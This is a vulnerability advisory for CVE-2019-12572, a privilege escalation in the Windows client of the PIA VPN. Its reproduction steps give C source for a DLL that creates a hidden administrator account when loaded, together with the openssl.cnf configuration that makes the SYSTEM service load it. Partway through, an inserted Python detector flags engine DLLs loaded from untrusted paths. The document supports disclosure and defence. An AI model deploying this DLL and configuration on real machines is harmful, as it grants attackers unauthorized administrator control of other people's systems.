Title: PIA Windows Privilege Escalation: Malicious OpenSSL engine
Author: Rich Mirch
CVE: CVE-2019-12572
Vendor Advisory: N/A
Blog Post: https://blog.mirch.io/2019/06/10/cve-2019-12572-pia-windows-privilege-escalation-malicious-openssl-engine/
Description
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN
Client 1.0.2 (build 02363) for Windows could allow an authenticated, local
attacker to run arbitrary code with elevated privileges.
On startup the PIA Windows service (pia-service.exe) loads the OpenSSL library from
C:\Program Files\Private Internet Access\libeay32.dll. This library attempts
to load the configuration file c:\etc\ssl\openssl.cnf, which does not exist. By
default on Windows systems, authenticated users can create directories under c:\.
A low privileged user can therefore create an openssl.cnf configuration file that loads a
malicious OpenSSL engine library, resulting in arbitrary code execution as
SYSTEM when the service starts.
CVSS
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:H/RL:U/RC:C
Base: 7.8
Temporal: 7.8
Test Environment
OS: Windows 10 Pro 10.0.17763
PIA Version: 1.0.2 (build 02363)
Steps to reproduce
Note: All steps are executed using a low privileged account.
1) Create the c:\etc\ssl directory
mkdir c:\etc\ssl
2) Create a malicious engine library named woot.dll to create an administrator
account named woot when loaded.
/* Cross Compile with
   x86_64-w64-mingw32-g++ woot.c -o woot.dll -shared
*/
#include <windows.h>
#include <stdlib.h>   /* system() */

/* Engine "library" whose only purpose is to run commands as the loading process (SYSTEM here). */
BOOL WINAPI DllMain(
    HINSTANCE hinstDLL,
    DWORD fdwReason,
    LPVOID lpReserved )
{
    switch( fdwReason )
    {
    case DLL_PROCESS_ATTACH:
        /* Runs once when pia-service.exe loads the DLL via the engine config. */
        system("cmd /c net user woot insertpasswordhere /add");
        system("cmd /c net localgroup administrators woot /add");
        break;
    case DLL_THREAD_ATTACH:
        // Do thread-specific initialization.
        break;
    case DLL_THREAD_DETACH:
        // Do thread-specific cleanup.
        break;
    case DLL_PROCESS_DETACH:
        // Perform any necessary cleanup.
        break;
    }
    return TRUE; // Successful DLL_PROCESS_ATTACH.
}
3) Copy the malicious woot.dll file into the c:\etc\ssl folder.
copy woot.dll c:\etc\ssl
4) Create the OpenSSL configuration file in c:\etc\ssl\openssl.cnf with the following contents.
openssl_conf = openssl_init
[openssl_init]
engines = engine_section
[engine_section]
woot = woot_section
[woot_section]
engine_id = woot
dynamic_path = c:\\etc\\ssl\\woot.dll
init = 0
5) Reboot the system because a low privilege user does not have permission to
restart the service.
6) After the reboot has completed, log in and open a command shell. At this point
the "woot" administrator account will exist.
net user woot
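The attack chain above hinges on one line of configuration: a dynamic_path in an engine section pointing at a DLL in a user-writable directory. As an added defender-side example (not part of the advisory or the PIA client), the following Python parses the openssl.cnf section/key format shown in step 4, follows the openssl_conf -> engines -> per-engine chain exactly as OpenSSL resolves it, and reports any engine library that lives outside an assumed allow-list of trusted directories (TRUSTED_PREFIXES is a placeholder policy; the sample config is a constructed copy of the one above):

```python
import re
from typing import Dict, List, Tuple

# Assumed allow-list of directories a trusted engine DLL may live in;
# adjust to the host's real install locations.
TRUSTED_PREFIXES = ("c:\\program files\\", "c:\\windows\\system32\\")

# Constructed sample: the configuration from step 4 of the advisory.
SAMPLE_CNF = r"""openssl_conf = openssl_init
[openssl_init]
engines = engine_section
[engine_section]
woot = woot_section
[woot_section]
engine_id = woot
dynamic_path = c:\\etc\\ssl\\woot.dll
init = 0
"""


def parse_openssl_cnf(text: str) -> Dict[str, Dict[str, str]]:
    """Return {section: {key: value}}; keys before any [section] go under ''."""
    sections: Dict[str, Dict[str, str]] = {"": {}}
    current = ""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        if not line:
            continue
        m = re.fullmatch(r"\[\s*([^\]\s]+)\s*\]", line)
        if m:
            current = m.group(1)
            sections.setdefault(current, {})
            continue
        key, sep, value = line.partition("=")
        if sep:
            # OpenSSL treats backslash as an escape, so "\\" in the file is one "\"
            sections[current][key.strip()] = value.strip().replace("\\\\", "\\")
    return sections


def engine_libraries(text: str) -> List[Tuple[str, str]]:
    """Follow openssl_conf -> engines -> engine sections; return (engine_id, dll path)."""
    cfg = parse_openssl_cnf(text)
    section = lambda name: cfg.get(name, {}) if name else {}
    engines_sect = section(section(cfg[""].get("openssl_conf", "")).get("engines", ""))
    found = []
    for name, sect in engines_sect.items():
        entry = section(sect)
        if "dynamic_path" in entry:
            found.append((entry.get("engine_id", name), entry["dynamic_path"]))
    return found


def untrusted_engines(text: str) -> List[Tuple[str, str]]:
    """Engines whose DLL path is outside TRUSTED_PREFIXES (case-insensitive)."""
    return [(eid, path) for eid, path in engine_libraries(text)
            if not path.lower().startswith(TRUSTED_PREFIXES)]
```

Running untrusted_engines over every openssl.cnf an OpenSSL-linked service can reach (here, the hard-coded c:\etc\ssl path) surfaces exactly the entry this advisory abuses; an empty result for a config that only references DLLs under Program Files is the expected clean state.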
Timeline:
2019-02-16: Reported to vendor
2019-02-16: Vendor confirmed vulnerability
2019-06-04: Vendor released fix in v1.2.1
2019-06-10: Public disclosure